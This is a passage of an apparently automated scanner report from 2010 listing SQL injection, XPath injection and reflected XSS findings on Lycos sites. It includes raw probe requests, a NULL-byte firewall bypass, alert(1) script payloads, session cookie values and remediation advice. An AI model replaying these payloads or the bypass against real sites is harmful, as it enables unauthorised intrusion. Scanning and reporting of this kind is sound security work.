SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/6pm-1460' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/best-buy-560' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/buy-com-233' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/dell-home-638' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/ebay-50' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/itunes-music-store-1414' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/jcpenney-320' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/kohls-1009' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/sony-style-716' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/walmart-321' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:22 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
1.11. http://www.gamesville.com/cash/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.gamesville.com
Path: /cash/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /cash/?1%00'=1 HTTP/1.1
Host: www.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... <div class="greet"> Failure is not falling down; it is not getting up again. </div> ...[SNIP]...
Request 2
GET /cash/?1%00''=1 HTTP/1.1
Host: www.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The PENTA cookie appears to be vulnerable to XPath injection attacks. The payload " was submitted in the PENTA cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /default.asp?query=travel&loc=travel HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460"; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:36:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:36:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a rel="nofollow" href="http://154875.r.msn.com/?ld=4vaSWBScKlAQ0JzlRqBOSqd9mPt_uvO1gdfOmHwv90hRyPKKcgcnM6FN7I-VDRwbnjr8DZ823IZOENRt_X7g6SCz0wOBPwoPo71vZO7GBXPaTHnE3eErmrTQu0_ozbxxVG-4BrJtFY1dnOJf3QXjmorN_Iwk4B2K2GvOJBwQ4bKdPW6LcLNOsQ9GU1lqIyLG3hspNM_cqfuwDpWsuTmlzwBOhfocQ5Vl1zIj3IRUp_3wj_fB9_Z7wcSVI1uw64qAiKC_SDmwNbMjtQPRetaVVbzWzxJLTD3kV8I1GO46TqUnc1VAlMlH5mb ...[SNIP]...
3. Cross-site scripting (reflected)
There are 380 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4f7<script>alert(1)</script>eae69146b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Date: Sun, 12 Dec 2010 14:26:56 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ca2<script>alert(1)</script>2c491182556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;sz=728x90;ord=123456789?\ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 109
Date: Sun, 12 Dec 2010 14:26:55 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf0b'-alert(1)-'46a749859b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
